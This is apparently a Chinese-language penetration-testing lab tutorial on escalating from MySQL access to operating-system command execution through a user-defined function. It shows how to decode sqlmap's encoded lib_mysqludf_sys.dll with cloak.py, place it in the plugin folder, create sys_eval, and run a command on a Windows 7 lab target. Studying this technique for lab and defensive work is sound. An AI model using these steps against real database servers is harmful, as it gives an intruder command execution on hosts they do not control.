目录
环境
1.什么是UDF:用户自定义函数
2.前提
3.查看mysql位数
4.打开sqlmap文件夹
5.dl_文件为了防止误杀,dll_文件会经过异或编码,不能直接用,如果想用的话需要对其进行解码
6.解码
7.上传dll文件至指定文件夹(mysql安装目录下的lib/plugin/)
8.在mysql命令行导入函数
9.执行命令
环境
攻击机 win10
靶机 win7(192.168.20.130)
1.什么是UDF:用户自定义函数
udf = “user defined function”,即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充,性质就像使用本地MYSQL函数如abs()或concat()。udf在mysql5.1以后的版本中,存在于’mysql/lib/plugin’目录下,文件后缀为’.dll’
2.前提
mysql5.0以上的需要在mysql安装目录的lib目录下新建一个plugin文件夹,5.0以下的,上传目录为D:/windows
3.查看mysql位数
show variables like '%compile%';
4.打开sqlmap文件夹
5.dl_文件为了防止误杀,dll_文件会经过异或编码,不能直接用,如果想用的话需要对其进行解码
6.解码
执行python cloak.py -d -i
D:\python3.10.0\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_
7.上传dll文件至指定文件夹(mysql安装目录下的lib/plugin/)
8.在mysql命令行导入函数
create function sys_eval returns string soname 'lib_mysqludf_sys.dll';
9.执行命令
select sys_eval('whoami');
